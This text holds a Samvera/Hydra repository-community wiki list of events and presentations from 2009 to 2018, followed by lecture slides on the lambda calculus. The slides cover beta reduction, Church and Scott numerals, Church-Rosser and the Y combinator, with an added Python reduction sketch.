Utah, Salt Lake City Sandy Metz/PODD II 3-5 October 2018 | Durham, NC Samvera Camp 24-27 September 2018 | Durham, NC Registration:
https://samveracamp-duke2018.eventbrite.com Samvera European Regional Group 20 September 2018 | Senate House, University of London Samvera Virtual Connect 2018 11 July 2018 | On-line: full details at the link above Repository Fringe 2-3 July 2018 | Royal Society of Edinburgh Open Repositories 2018 4-7 June 2018 | Montana State University, Bozeman, Montana - Samvera workshop for OR18: Presentation **Advanced Samvera Camp** 7-9 May 2018 | Minneapolis, MN **Samvera Camp** 23-26 April 2018 | Portland, Oregon **Samvera European Regional Group** 19 April 2018 | Senate House, University of London **Samvera Developers' Congress** 29-30 March 2018 | Stanford University **Samvera Partner meeting** 29-30 March 2018 | Stanford University **LDCX** Invitation only 26-28 March 2018 | Stanford University **Samvera West Coast Regional meeting** 16 March 2018 | Henry Madden Library, Fresno State in Fresno, CA **Samvera Europe meeting** 14 December 2017 | LSE, London **Samvera Connect 2017** 6-9 November 2017 | Evanston, IL **Fedora and Samvera Camp** 4-8 September | University of Oxford, UK **Samvera European Regional Group** 27 July 2017 | LSE, London **Samvera Virtual Connect 2017** Open Repositories 2017 26-29 June 2017 | Brisbane, Australia Advanced Hydra Camp 8-10 May 2017 | Minneapolis, MN Hydra Camp 17-20 April 2017 | Emory University Hydra Developers’ congress 30-31 March 2017 | Stanford University Hydra Partner meeting 30-31 March 2017 | Stanford University LDCX Invitation-only event 27-29 March 2017 | Stanford University West Coast Regional Meeting 10 February 2017 | UC Santa Cruz Hydra Connect 2016 3-6 October 2016 | Boston, MA Penn State developer event 19-23 September 2016 | State College, PA Archivematica Camp 24-26 August 2016 | University of Michigan School of Information Hydra Virtual Connect 2016 7 July 2016 | On-line: full details at the link above Open Repositories 2016 13-16 June, 2016 | Dublin, Ireland Annual open source conference for the repository community Hydra Developers’ congress May 2016 | University of Michigan, Ann Arbor Hydra Developers’ congress 24-25 March 2016 | Stanford University Hydra Power Steering meeting Invitation-only event 24-25 March 2016 | Stanford University LDCX Invitation-only event 21-23 March 2016 | Stanford University West Coast Regional Meeting 26 February 2016 | UCSB Hydra Camp 22-25 February 2016 | UCSB Hydra Developers’ congress 3-5 February 2016 | UCSD Hydra Connect 2015 21-24 September, 2015 | Minneapolis, Minnesota Open Repositories 2015 8-11 June, 2015 | Indianapolis, Indiana Annual open source conference for the repository community List of Hydra-related presentations etc at OR2015 Hydra Northeast (US) Regional Meeting 7 May 2015 | Brown University, Providence, Rhode Island Hydra Europe Symposium 2015 23-24 April 2015 | London School of Economics and Political Science (LSE), London Hydra Camp London 20-23 April 2015 | London School of Economics and Political Science (LSE), London Hydra Developers’ congress 26-27 March 2015 | Stanford University Hydra Power Steering meeting Invitation-only event 26-27 March 2015 | Stanford University LAMDevConX Invitation-only event 23-25 March 2015 | Stanford University Hydra: many heads, many connections. 
Enriching Fedora Repositories with ORCID (slides and recording) 2 April 2015 | Duraspace Hot Topics Series: Integrating ORCID Persistent Identifiers with DSpace, Fedora and VIVO Advanced Blacklight Workshop 13 March 2015 | Yale University, New Haven, Connecticut Hydra Camp 9-12 March 2015 | Yale University, New Haven, Connecticut Post-Code4Lib Hydra Developers' meeting 12-13 February 2015 | UoPDX Library, Portland, Oregon Code4Lib 9-12 February 2015 | Portland Hilton (Portland, OR) a. RailsBridge (Carolyn Cole) b. Intro to Blacklight (Justin Coyne, Mark Bussey, Jessie Keck) c. GeoHydra / GeoBlacklight (Jack Reed, Darren Hardy, Bess Sadler) d. Dive into Hydra (Possibly with a focus on installing Worthwhile) (Justin Coyne, Mark Bussey, Bess Sadler) e. Orienting newcomers and/or Q&A - possible times 10th International Digital Curation Conference (IDCC) 9-12 February 2015 | Royal College of General Practitioners, 30 Euston Square (London, UK) a. Meeting institutional needs for digital curation through shared endeavour: the application of Hydra/Fedora at the University of Hull (Chris Awre) CNI Fall Member Meeting 8-9 December 2014 | Washington DC - Digital Repository Development at Yale Library, from Michael Dula, CTO of Yale Library DLF Forum 2014 27-29 October 2014 | Atlanta, Georgia There is a wealth of Hydra and Hydra-related content at DLF this year. If you won't be able to make it to Hydra Connect 2 (Cleveland, Sept 30-Oct 2), or if you want to carry on the conversation with the broader community, you should consider booking early to DLF: they tend to fill up relatively early. - Hydra Installfest: Monday, October 27, 1:30-3:30pm, Salons 1,2,3 - Developing With Hydra: Tuesday, October 28, 1:30-3:30pm, Salons 1,2,3 - DevOps for Digital Repositories - Sustaining Open Source Software - The Future of Fedora: Update on Fedora 4 - Avalon Media System: Implementation and Community - Spotlight: A Self-Service Tool for Showcasing Digital Collections - Placing the IR Within the User's Workflow: Connecting Hydra-based Repositories with Zotero Hydra UK Regional meeting 22 October 2014 | London School of Economics and Political Science AMIA 2014 8-11 October 2014 | Savannah, Georgia Association of Moving Image Archivists (AMIA) annual conference Hydra Connect #2 - 30 September - 3 October 2014 | Case Western University, Cleveland, Ohio Annual gathering of the Hydra Community - 4 days including workshops, plenary and breakout sessions Innovatics conference 27-29 August 2014 | Santiago and Valparaiso, Chile Dive into Hydra workshop (in Spanish) as part of Innovatics conference Keynote speaker (Bess Sadler) Hydra Camp - 26-29 August 2014 | Princeton, New Jersey Four day Hydra Developer training class - syllabus Open Repositories 2014 9-13 June, 2014 | Helsinki, Finland Annual open source conference for the repository community. See below the list of Hydra-related talks accepted, with timings and links to abstracts on the OR2014 conference website. 
Workshops • WK1A and WK2A: GIS in Digital Repositories, 9th June, 9:00am-5:00pm - Abstract • WK1G: Introduction to Hydra for Developers, 9th June, 9:00-12:30 - Abstract • WK2E: DevOps for Digital Libraries, 9th June, 1:30-5:00 - Abstract • WK2F: Implementing RDF metadata in Hydra, 9th June, 1:30-5:00 - Abstract • WK3B: Hydra for Managers, 9th June, 5:30-7:00 - Abstract OR2014 Plenary • P3C: Self-deposit, discovery, and delivery of scientific datasets using GeoHydra, 10th June, 3:00-4:15 - Abstract • P4A: Spotlight: A Blacklight Plugin for Showcasing Digital Collections, 11th June, 11:15-12:30 - Abstract • P4E: Hacking User Experience in a Repository Service: ScholarSphere as a Case Study, 11 June, 11:15-12:30 - Abstract • P4B: Distributed Repositories of Medieval Calendars and Crowd-Sourcing of Transcription, 11 June 11:15-12:30 - Abstract • P4B: From Local Practice to Linked Open Data: Rethinking Metadata in Hydra, 11 June, 11:15-12:30 - Abstract • P4C: Building Successful, Open Repository Software Ecosystems: Technology and Community, 11th June, 11:15-12:30 - Abstract • P7A: From library repository to university-wide service: Stanford Digital Repository as a case study, 12th June, 11:15-12:30 - Abstract • P7C: Leveraging Agile & Resourcing for Success - Hydramata, Avalon, Fedora 4 and Islandora (panel), 12th June, 11:15-12:30 - Abstract • P7A: Audio and Video Repositories at Scale: Indiana University’s Media Digitization and Preservation Initiative, 12th June, 1:30-2:20 - Abstract • P8B: Sustaining your open source project through training: a Hydra case study, 12th June, 1:30-2:20 - Abstract • P8B: Hydramata: Building a Nimble Solution with Hydra to Transcend the Institutional Repository, 12th June, 1:30-2:20 - Abstract Fedora Interest Group • IG3A (Fedora/Hydra): Facing the Hydra alone: three case studies, 13th June, 11:15-12:30 - Abstract • IG3A (Fedora/Hydra): Extending the Hydra Head to Create a Pluggable, Extensible Architecture: Diving into the Technology of Hydramata, 13th June, 11:15-12:30 - Abstract • IG3A (Fedora/Hydra): Issues with Fedora & Hydra, experiences from a research-data-driven implementation, 13th June, 11:15-12:30 - Abstract • IG4A (Fedora): Avalon Media System project update: a Hydra solution for digital audio and video access, 13th June, 1:30-2:45 - Abstract Posters and Demonstrations - 10th June, 6:30-9:00 - Abstracts • Hydra Europe • Avalon Media System demonstration ORCID Outreach and CodeFest Meeting 21-22 May 2014 | Chicago Outreach meeting for customers, ORCID members, and researchers highlighting solutions and adoption strategies. 
• ORCID Identifiers in Repositories Panel: ORCID Hydra Plug-in Hydra Camp - 6-9 May | Minneapolis Four day Hydra developer training Hydra Developers Congress - 24-25 April 2014 | Stanford University Two day in-person Hydra Developer coding fest Hydra "Power" Steering meeting - invitation only - 24-25 April 2014 | Stanford University Two day strategic planning event - Hydra Steering Group and Invited advisers only LAMDevConX - invitation only 21-23 April 2014 | Stanford University Library, Archive, and Museum technical summit - invitation only event European Hydra Camp - 8-11 April 2014 | Trinity College Dublin Four day Hydra developer training course European Hydra Symposium Code4Lib 2014 24 - 27 March | Raleigh, NC Annual grassroots library technologist conference in the US - Intro to Blacklight - Blacklight hackfest - Rails Bridge intro to programming - GeoHydra: Managing Geospatial Content Scheduled talks: - Building for others (and ourselves): the Avalon Media System - Sustaining your Open Source project through training - Behold Fedora 4: The Incredible Shrinking Repository! ORCID Dev Congress 4-7 March 2014 | Chicago Dev House ORCID and Hydra Plug-in integration Adopter and Contributor Dev Meeting to jump start adoption Hydra Connect January 2014 21-24 January 2014 | UCSD, San Diego Hydra Activities at DLF2013 CNI Fall 2013 9-10 Dec 2013 | Washington, DC - Collaborating to Manage Research Data (Notre Dame and Hydra Partners) (pptx) DLF 2013 4-6 Nov 2013 | Austin, TX Hydra Activities at DLF2013 EOD Conference 17-18 October 2013 | National Library of Technology, Prague, Czech Republic From content silos to an integrated digital library (Royal Library project presentation, including slides about Hydra) HydraCamp 1-4 October 2013 | Case Western Reserve University, Cleveland, OH HydraCamp Syllabus - Fall 2013 DARIAH General VCC Meeting 5-6 September 2013 | Copenhagen, Denmark Using Hydra/Fedora for digital library infrastructure (5 minutes presentation) OR13 Conference 7-13 July 2013 | Prince Edward Island, Canada Hydra Activities at OR13 - State of the HydraSphere for OR13 (pptx) 24x7 Presentation: "Testing Your Archive: Delivering on the Promise of Persistence" Duke University Libraries Preservation Repository Hydra poster Hydra Camp 8-12 April 2013 | Dublin LibDevConX^4 25-27 March 2013 | Stanford Code4Lib 2013 February 11-14 | Chicago, IL Hydra UK 22 November 2012, LSE, London - Introduction to Hydra by Chris Awre - Hydra in Hull by Richard Green - Hydra@GCU: a repository for audio and video by Caroline Webb - Hydra at LSE by Ed Fay - Hydra at Oxford by Neil Jefferies - Hydra UK discussion notes - Twitter hashtag for ongoing comment and discussion - #hydrauk - Ariadne event report Hydra Webinar Series - Fall, 2012 - DuraSpace Webinar Hub - Series Announcement - Hydra Webinar Series - 2012 - Webinar 1 – Introduction to Hydra, presented by Tom Cramer (Sept 25, 2012) - Watch the Webinar Recording - View the slides (slideshare) - Webinar 2 - A Case Study on General Repository Applications, presented by Rick Johnson and Richard Green (Oct 16, 2012) - Watch the Webinar Recording - View the slides (slideshare) - Webinar 3 - Hydra Technical Deep Dive, presented by Matt Zumwalt (scheduled for Oct 30, 2012, but recorded separately due to Superstorm Sandy) - Watch the Webinar Recording - Watch the Q&A follow-up session - View the slides (slideshare) OR12 Conference 9-13 July 2012, Edinburgh – Schedule of Hydra Events at OR12 in Edinburgh - Intro to Hydra for OR12 PreConWorkshop by Chris Awre - 
HydraSphere: One Body, Many More Heads, One Year Later Fedora User Group panel on Hydra, by Tom Cramer - Hylandora by Tom Cramer and Jonathan Green - Hydra Framework Technical Update for OR12 by Matt Zumwalt - Seaside Research Portal: A Best of Breed Approach to Digital Exhibits and Collection Management by Rick Johnson - Towards a mature, multi-purpose repository for the institution by Chris Awre LibDevConX^3 26-28 March 2012, Stanford CNI 2011 December 12 - 13, 2011 | Arlington, VA *Hydra: One Body, Many Heads for Repository-Powered Library Applications* DLF 2011 Forum 31 Oct - 1 November, 2011 | Baltimore Hypatia *Proposal, Powerpoint* OR11 Conference 7-11 June 2011 | Austin Main conference presentation *Building the Hydra - Enhancing Repository Provision through Multi-Institution Collaboration*: Chris Awre Fedora track 24/7 block: * SALT, ETDs and EEMs - Stanford's suite of Hydra services: Tom Cramer * Libra - an unmediated, self-deposit, institutional repository at the University of Virginia : Julie Meloni * Hydra in Hull: Richard Green * A Hydra head for Northwestern University Digital Image Library: Bill Parod * Hydra-based digital exhibits gallery at Notre Dame: Dan Brubaker Horst Fedora track: Tools and integration * Hydra technical deep-dive: Matt Zumwalt Hydra-related presentations * CLIF: Moving repositories upstream in the content lifecycle: Richard Green and Simon Waddington LibDevConX^2 21 - 23 March 2011 | Stanford University Code4Lib 2011 7-10 February, 2011 | Bloomington, Indiana Related Presentations: * Digital Exhibits at Notre Dame Using Hydra by Rick Johnson & Dan Brubaker Horst * Opinionated Metadata by Matt Zumwalt Fedora UK & Ireland group meeting 13 December 2010 | London School of Economics and Political Science DLF Fall Forum 1-3 November 2010 | Palo Alto, CA *Tom Cramer & Matt Zumwalt's presentation* Hydra Camp 4-8 October 2010 | Minneapolis Repository Fringe September 2010 | Edinburgh Presentation: Hydra - Chris Awre (Video) OR10 Conference 6-9 July 2010 | Madrid Related Presentations: Hydra: a technical and community framework for customised, shared repository applications Blacklight: Leveraging a Rich Discovery Interface in Open Repository Architectures LibDevConX 23 - 25 March 2010 | Stanford University Fedora UK & Ireland User Group, Fedora EU User Group 8 December 2009 | Oxford Presentations: - The Hydra initiative: Underpinning repository interaction for research support - Chris Awre - Content models in the Hydra Project - Richard Green Fedora UK & Ireland User Group 9 June 2009 | Dublin, Republic of Ireland OR09 Conference 18-21 May 2009 | Atlanta, GA Presentations: - Designing and building a reusable framework for multipurpose, multifunction, multi-institutional repository-powered solutions - available here - Case studies in workflow: Three approaches - available here Related Conferences - Annual schedule of Samvera-related conferences which Samverans may be interested in attending
{"Source-Url": "https://wiki.lyrasis.org/download/temp/pdfexport-20200912-120920-2127-5163/samvera-Events%2Cpresentationsandarticles-120920-2127-5164.pdf?contentType=application/pdf", "len_cl100k_base": 5137, "olmocr-version": "0.1.53", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 27623, "total-output-tokens": 6452, "length": "2e12", "weborganizer": {"__label__adult": 0.000530242919921875, "__label__art_design": 0.00220489501953125, "__label__crime_law": 0.0007276535034179688, "__label__education_jobs": 0.0958251953125, "__label__entertainment": 0.00043702125549316406, "__label__fashion_beauty": 0.000331878662109375, "__label__finance_business": 0.002353668212890625, "__label__food_dining": 0.0005044937133789062, "__label__games": 0.0011587142944335938, "__label__hardware": 0.0010957717895507812, "__label__health": 0.0007348060607910156, "__label__history": 0.0016870498657226562, "__label__home_hobbies": 0.0004651546478271485, "__label__industrial": 0.0005664825439453125, "__label__literature": 0.0010347366333007812, "__label__politics": 0.0011243820190429688, "__label__religion": 0.0006422996520996094, "__label__science_tech": 0.05950927734375, "__label__social_life": 0.002239227294921875, "__label__software": 0.308837890625, "__label__software_dev": 0.51513671875, "__label__sports_fitness": 0.0004398822784423828, "__label__transportation": 0.0006890296936035156, "__label__travel": 0.001720428466796875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 19216, 0.08668]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 19216, 0.00315]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 19216, 0.79345]], "google_gemma-3-12b-it_contains_pii": [[0, 1387, false], [1387, 2480, null], [2480, 3287, null], [3287, 3962, null], [3962, 4802, null], [4802, 5766, null], [5766, 6785, null], [6785, 9072, null], [9072, 11757, null], [11757, 13316, null], [13316, 14767, null], [14767, 16627, null], [16627, 18141, null], [18141, 19216, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1387, true], [1387, 2480, null], [2480, 3287, null], [3287, 3962, null], [3962, 4802, null], [4802, 5766, null], [5766, 6785, null], [6785, 9072, null], [9072, 11757, null], [11757, 13316, null], [13316, 14767, null], [14767, 16627, null], [16627, 18141, null], [18141, 19216, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 19216, null]], "pdf_page_numbers": [[0, 1387, 1], [1387, 2480, 2], [2480, 3287, 3], [3287, 3962, 4], [3962, 4802, 5], [4802, 5766, 6], [5766, 6785, 7], [6785, 9072, 8], [9072, 11757, 9], [11757, 13316, 10], [13316, 14767, 11], 
[14767, 16627, 12], [16627, 18141, 13], [18141, 19216, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 19216, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
0d8891f03c7973476e4886cedaba238616d7448b
CMSC 631 – Program Analysis and Understanding Fall 2007 Lambda Calculus Motivation • Commonly-used programming languages are large and complex ■ ANSI C99 standard: 538 pages ■ ANSI C++ standard: 714 pages ■ Java language specification 2.0: 505 pages • Not good vehicles for understanding language features or explaining program analysis Goal • Develop a “core language” that has ■ The essential features ■ No overlapping constructs ■ And none of the cruft – Extra features of the full language can be defined in terms of the core language (“syntactic sugar”) • Lambda calculus ■ Standard core language for single-threaded procedural programming ■ Often with added features (e.g., state); we’ll see that later Lambda Calculus is Practical! • An 8-bit microcontroller (Zilog Z8 Encore board w/4KB SRAM) computing 1 + 1 using Church numerals in the Lambda calculus Origins of Lambda Calculus - Invented in 1936 by Alonzo Church (1903-1995) - Princeton mathematician - Lectures on the lambda calculus published in 1941 - Also known for - Church’s Thesis - All effective computation is expressed by recursive (decidable) functions, i.e., in the lambda calculus - Church’s Theorem - First-order logic is undecidable Lambda Calculus - Syntax: - \( e ::= x \) variable - \( \lambda x.\, e \) function abstraction - \( e \ e \) function application - Only constructs in the pure lambda calculus - Functions take functions as arguments and return functions as results - I.e., the lambda calculus supports higher-order functions Semantics - To evaluate \((\lambda x. e_1) \ e_2\) - Bind \(x\) to \(e_2\) - Evaluate \(e_1\) - Return the result of the evaluation - This is called “beta reduction” - \((\lambda x. e_1) \ e_2 \rightarrow_\beta e_1[e_2/x]\) - \((\lambda x. e_1) \ e_2\) is called a redex - We’ll usually omit the beta Three Conveniences - Syntactic sugar for local declarations - \(let \ x = e_1 \ in \ e_2\) is short for \((\lambda x. e_2) \ e_1\) - Scope of \(\lambda\) extends as far to the right as possible - \(\lambda x. \lambda y. x \ y\) is \(\lambda x. (\lambda y. (x \ y))\) - Function application is left associative - \(x \ y \ z\) is \((x \ y) \ z\) Scoping and Parameter Passing • Beta reduction is not yet precise ■ \((\lambda x.e_1) \ e_2 \rightarrow e_1[e_2/x]\) ■ what if there are multiple \(x\)’s? • Example: ■ let \(x = a\) in ■ let \(y = \lambda z.x\) in ■ let \(x = b\) in \(y \ x\) ■ which \(x\)’s are bound to \(a\), and which to \(b\)? Static (Lexical) Scope • Just like most languages, a variable refers to the closest definition • Make this precise using variable renaming ■ The term – let \(x = a\) in let \(y = \lambda z.x\) in let \(x = b\) in \(y \ x\) ■ is “the same” as – let \(x = a\) in let \(y = \lambda z.x\) in let \(w = b\) in \(y \ w\) ■ Variable names don’t matter Free and Bound Variables • The set of free variables of a term is - \( \text{FV}(x) = \{x\} \) - \( \text{FV}(\lambda x.e) = \text{FV}(e) - \{x\} \) - \( \text{FV}(e_1 \ e_2) = \text{FV}(e_1) \cup \text{FV}(e_2) \) • A term \( e \) is closed if \( \text{FV}(e) = \emptyset \) • A variable that is not free is bound Alpha Conversion • Terms are equivalent up to renaming of bound variables - \( \lambda x.e = \lambda y.(e[y/x]) \) if \( y \notin \text{FV}(e) \) • This is often called alpha conversion, and we will use it implicitly whenever we need to avoid capturing variables when we perform substitution Substitution • Formal definition: - \( x[e/x] = e \) - \( z[e/x] = z \) if \( z \neq x \) - \( (e_1 \ e_2)[e/x] = (e_1[e/x] \ e_2[e/x]) \) - \( (\lambda z. e_1)[e/x] = \lambda z. (e_1[e/x]) \) if \( z \neq x \) and \( z \notin \text{FV}(e) \)
• Example: - \( (\lambda x. y \ x) \ x =_\alpha (\lambda w. y \ w) \ x \rightarrow_\beta y \ x \) - (We won’t write alpha conversion explicitly in general) A Note on Substitutions • People write substitution many different ways - \( e_1[e_2/x] \) - \( e_1[x \mapsto e_2] \) - \([x/e_2]e_1 \) - and more... • But they all mean the same thing - The variable is being substituted with the term Multi-Argument Functions - We can’t (yet) write multi-argument functions - E.g., a function of two arguments \( \lambda(x, y).e \) - Trick: Take arguments one at a time - \( \lambda x. \lambda y. e \) - This is a function that, given argument \( x \), returns a function that, given argument \( y \), returns \( e \) - \( (\lambda x. \lambda y. e) \ a \ b \rightarrow (\lambda y. e[a/x]) \ b \rightarrow e[a/x][b/y] \) - This is often called Currying and can be used to represent functions with any # of arguments Booleans - \( \text{true} = \lambda x. \lambda y. x \) - \( \text{false} = \lambda x. \lambda y. y \) - if \( a \) then \( b \) else \( c \) = \( a \ b \ c \) - Example: - if \( \text{true} \) then \( b \) else \( c \) \( \rightarrow (\lambda x. \lambda y. x) \ b \ c \rightarrow (\lambda y. b) \ c \rightarrow b \) - if \( \text{false} \) then \( b \) else \( c \) \( \rightarrow (\lambda x. \lambda y. y) \ b \ c \rightarrow (\lambda y. y) \ c \rightarrow c \) Combinators • Any closed term is also called a combinator ■ So true and false are both combinators • Other popular combinators ■ I = \( \lambda x.x \) ■ K = \( \lambda x.\lambda y.x \) ■ S = \( \lambda x.\lambda y.\lambda z.x \; z \; (y \; z) \) ■ Can also define calculi in terms of combinators – E.g., the SKI calculus – Turns out the SKI calculus is also Turing complete Pairs • \((a, b) = \lambda x.\text{if } x \text{ then } a \text{ else } b\) • \(\text{fst} = \lambda p.p \; \text{true}\) • \(\text{snd} = \lambda p.p \; \text{false}\) • Then ■ \(\text{fst} \; (a, \; b) \rightarrow^* a\) ■ \(\text{snd} \; (a, \; b) \rightarrow^* b\) Natural Numbers (Church) - $0 = \lambda f.\lambda x.\, x$ - $1 = \lambda f.\lambda x.\, f \ x$ - $2 = \lambda f.\lambda x.\, f\,(f \ x)$ - i.e., $n = \lambda f.\lambda x.\, \text{<apply f n times to x>}$ - $\text{succ} = \lambda n.\lambda f.\lambda x.\, f\,(n \ f \ x)$ - $\text{iszero} = \lambda n.\, n \ (\lambda x. \text{false}) \ \text{true}$ Natural Numbers (Scott) - $0 = \lambda x.\lambda y.\, x$ - $1 = \lambda x.\lambda y.\, y \ 0$ - $2 = \lambda x.\lambda y.\, y \ 1$ - I.e., $n = \lambda x.\lambda y.\, y \ (n-1)$ - $\text{succ} = \lambda n.\lambda x.\lambda y.\, y \ n$ - $\text{pred} = \lambda n.\, n \ 0 \ (\lambda x. x)$ - $\text{iszero} = \lambda n.\, n \ \text{true} \ (\lambda x. \text{false})$ A Nondeterministic Small-Step Semantics \[(\lambda x. e_1) \ e_2 \rightarrow e_1[e_2/x]\] \[\frac{e \rightarrow e'}{\lambda x. e \rightarrow \lambda x. e'} \qquad \frac{e_1 \rightarrow e_1'}{e_1 \ e_2 \rightarrow e_1' \ e_2} \qquad \frac{e_2 \rightarrow e_2'}{e_1 \ e_2 \rightarrow e_1 \ e_2'}\] Why are these semantics non-deterministic? Example - We can apply reduction anywhere in a term - \[\lambda x. (\lambda y. y) \ x \ ((\lambda z. w) \ x) \rightarrow \lambda x. x \ ((\lambda z. w) \ x) \rightarrow \lambda x. x \ w\] - \[\lambda x. (\lambda y. y) \ x \ ((\lambda z. w) \ x) \rightarrow \lambda x. (\lambda y. y) \ x \ w \rightarrow \lambda x. x \ w\] - Does the order of evaluation matter?
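The substitution and reduction rules above can be executed directly. Below is a minimal sketch (not from the original slides) in Python; the term encoding and the helper names `subst`, `step`, and `normalize` are illustrative assumptions. It contracts redexes in two different orders on the example term and reaches the same normal form, which is exactly what the next slide's Church-Rosser theorem predicts.

```python
import itertools

# Terms (an assumed encoding): ("var", x) | ("lam", x, body) | ("app", fun, arg)
_fresh_names = (f"_v{i}" for i in itertools.count())

def free_vars(t):
    if t[0] == "var":
        return {t[1]}
    if t[0] == "lam":
        return free_vars(t[2]) - {t[1]}
    return free_vars(t[1]) | free_vars(t[2])

def subst(t, x, s):
    """Capture-avoiding substitution t[s/x], following the definition above."""
    if t[0] == "var":
        return s if t[1] == x else t
    if t[0] == "app":
        return ("app", subst(t[1], x, s), subst(t[2], x, s))
    _, y, body = t
    if y == x:                        # binder shadows x: nothing to substitute below
        return t
    if y in free_vars(s):             # alpha-convert so free y in s is not captured
        z = next(_fresh_names)
        body, y = subst(body, y, ("var", z)), z
    return ("lam", y, subst(body, x, s))

def step(t, args_first):
    """Contract one beta-redex; `args_first` changes which redex gets picked."""
    if t[0] == "lam":
        body, did = step(t[2], args_first)
        return ("lam", t[1], body), did
    if t[0] == "app":
        f, a = t[1], t[2]
        if not args_first and f[0] == "lam":          # outermost redex first
            return subst(f[2], f[1], a), True
        for pick in ("a", "f") if args_first else ("f", "a"):
            new, did = step(a if pick == "a" else f, args_first)
            if did:
                return (("app", f, new) if pick == "a" else ("app", new, a)), True
        if f[0] == "lam":                             # argument is normal: contract now
            return subst(f[2], f[1], a), True
    return t, False

def normalize(t, args_first=False):
    did = True
    while did:                        # note: loops forever on divergent terms
        t, did = step(t, args_first)
    return t

def show(t):
    if t[0] == "var":
        return t[1]
    if t[0] == "lam":
        return f"(\\{t[1]}. {show(t[2])})"
    return f"({show(t[1])} {show(t[2])})"

# The example term above: \x. ((\y. y) x) ((\z. w) x)
V = lambda name: ("var", name)
term = ("lam", "x",
        ("app", ("app", ("lam", "y", V("y")), V("x")),
                ("app", ("lam", "z", V("w")), V("x"))))

print(show(normalize(term, args_first=False)))   # (\x. (x w))
print(show(normalize(term, args_first=True)))    # (\x. (x w)) -- same normal form
```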
The Church-Rosser Theorem - Lemma (The Diamond Property): - If \( a \rightarrow b \) and \( a \rightarrow c \), there exists \( d \) such that \( b \rightarrow^* d \) and \( c \rightarrow^* d \) - Church-Rosser Theorem: - If \( a \rightarrow^* b \) and \( a \rightarrow^* c \), there exists \( d \) such that \( b \rightarrow^* d \) and \( c \rightarrow^* d \) - Proof: By the diamond property - Church-Rosser is also called confluence Proof (diagram omitted) Normal Form • A term is in normal form if it cannot be reduced • Examples: $\lambda x.x$, $\lambda x.\lambda y.z$ • Some normal forms are referred to as values: the “legal” end results of programs • By the Church-Rosser Theorem, every term reduces to at most one normal form • Notice that for our application rule, the argument need not be a normal form Beta-Equivalence • Let $=_{\beta}$ be the reflexive, symmetric, and transitive closure of $\rightarrow$ • Usually we think only of reduction; adding symmetry extends this to equivalence • E.g., $(\lambda x.x) \ y \rightarrow y \leftarrow (\lambda z.\lambda w.z) \ y \ y$, so all three are beta-equivalent • If $a =_{\beta} b$, then $\exists c$ such that $a \rightarrow^* c$ and $b \rightarrow^* c$ • Proof: Consequence of the Church-Rosser Theorem • In particular, if $a =_{\beta} b$ and both are normal forms, then they are equal Not Every Term Has a Normal Form - Consider - \( \Delta = \lambda x.\, x \ x \) - Then \( \Delta \ \Delta \rightarrow \Delta \ \Delta \rightarrow \cdots \) - In general, self application leads to loops - ...which is good if we want recursion --- Type systems and normalization - It is possible to use types to distinguish “well-behaved” lambda calculus expressions from the others - Often, type systems can be used to establish that all well-typed expressions have a normal form - if \( e : t \) then \( e \rightarrow^* v \) - If an expression \( e \) has a type \( t \), then \( e \) reduces to a normal form \( v \) (\( v \) is a value; irreducible) - This kind of property of a type system is called “strong normalization.” More on type systems later. **A Fixpoint Combinator** - Also called a paradoxical combinator \[ Y = \lambda f.\, (\lambda x.\, f\,(x \ x)) \ (\lambda x.\, f\,(x \ x)) \] Note: There are many versions of this combinator - Then \( Y \ F =_{\beta} F \ (Y \ F) \) for any \( F \) \[ Y \ F = (\lambda f.\, (\lambda x.\, f\,(x \ x)) \ (\lambda x.\, f\,(x \ x))) \ F \] \[ \rightarrow (\lambda x.\, F\,(x \ x)) \ (\lambda x.\, F\,(x \ x)) \] \[ \rightarrow F\,((\lambda x.\, F\,(x \ x)) \ (\lambda x.\, F\,(x \ x))) \] \[ \leftarrow F\,(Y \ F) \] --- **Example** - Fact \( n = \text{if } n = 0 \text{ then } 1 \text{ else } n \times \text{fact}(n-1) \) - Let \( G = \lambda f. \text{<body of factorial>} \) I.e., \( G = \lambda f. \lambda n. \text{if } n = 0 \text{ then } 1 \text{ else } n \times f(n-1) \) - \( Y\,G\,1 =_\beta G\,(Y\,G)\,1 \) \[ =_\beta (\lambda f. \lambda n. \text{if } n = 0 \text{ then } 1 \text{ else } n \times f(n-1))\, (Y\,G)\,1 \] \[ =_\beta \text{if } 1 = 0 \text{ then } 1 \text{ else } 1 \times ((Y\,G)\,0) \] \[ =_\beta \text{if } 1 = 0 \text{ then } 1 \text{ else } 1 \times (G\,(Y\,G)\,0) \] \[ =_\beta \text{if } 1 = 0 \text{ then } 1 \text{ else } 1 \times ((\lambda f. \lambda n. \text{if } n = 0 \text{ then } 1 \text{ else } n \times f(n-1))\, (Y\,G)\,0) \] \[ =_\beta \text{if } 1 = 0 \text{ then } 1 \text{ else } 1 \times (\text{if } 0 = 0 \text{ then } 1 \text{ else } 0 \times ((Y\,G)(0-1))) \] \[ =_\beta \text{if } 1 = 0 \text{ then } 1 \text{ else } 1 \times 1 \] \[ =_\beta 1 \times 1 = 1 \]
